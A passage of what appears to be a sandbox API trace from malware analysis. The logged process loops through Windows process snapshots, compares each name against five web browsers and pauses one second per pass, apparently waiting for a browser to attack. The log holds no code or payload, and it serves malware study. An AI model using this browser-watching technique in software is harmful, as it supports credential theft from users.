lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.677] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.677] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.677] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0228.677] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.677] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.677] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0228.677] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0228.677] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0228.677] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0228.677] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.677] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.678] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0228.678] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0228.678] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0228.678] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0228.678] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.678] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.678] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.678] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.679] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.679] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0228.679] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.679] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.679] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.679] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.679] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.679] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0228.679] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.679] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.680] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0228.680] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.680] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0228.681] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0228.681] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0228.681] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0228.681] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0228.681] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0228.681] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0228.681] CloseHandle (hObject=0xe8) returned 1 [0228.681] Sleep (dwMilliseconds=0x3e8) [0229.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0229.689] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.690] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0229.690] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0229.690] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0229.690] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0229.690] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0229.690] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.690] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0229.690] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0229.690] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0229.690] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0229.690] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0229.690] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.691] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0229.691] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0229.691] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0229.691] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0229.691] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.691] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.691] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0229.691] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0229.692] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0229.692] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0229.692] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.692] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.692] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0229.692] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0229.692] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0229.692] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0229.692] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.692] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.693] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0229.693] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0229.693] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0229.693] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0229.693] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.693] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.693] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0229.693] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0229.693] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0229.693] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0229.693] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.693] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.694] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0229.694] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0229.694] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0229.694] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0229.694] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.694] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.694] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0229.694] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0229.694] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0229.694] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0229.694] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.694] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0229.695] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0229.695] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0229.695] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0229.695] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0229.695] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.695] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.695] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.696] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.696] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.696] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.696] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.696] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.696] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.696] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.696] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.696] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.696] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.696] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.697] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.697] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.697] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.698] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.698] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.698] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.698] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.698] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.698] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0229.698] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0229.698] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0229.698] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0229.698] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0229.698] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.698] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.699] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.699] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.699] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.699] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.699] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.699] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.700] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.700] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.700] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.700] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.700] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.700] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.700] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0229.700] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0229.700] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0229.700] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0229.700] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.700] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.701] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0229.701] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0229.701] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0229.701] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0229.701] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.701] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.701] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0229.701] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0229.701] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0229.701] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0229.701] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.701] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.702] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0229.702] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0229.702] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0229.702] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0229.702] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.702] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.702] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0229.702] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0229.702] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0229.702] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0229.702] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.703] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0229.703] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0229.703] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0229.703] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0229.703] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0229.703] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.703] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0229.704] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0229.704] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0229.704] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0229.704] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0229.704] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.704] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0229.704] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0229.704] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0229.704] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0229.705] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0229.705] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.705] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0229.705] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0229.705] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0229.705] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0229.705] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0229.705] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.705] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0229.706] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0229.706] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0229.706] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0229.706] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0229.706] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.706] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0229.706] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0229.706] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0229.706] lstrcmpiA 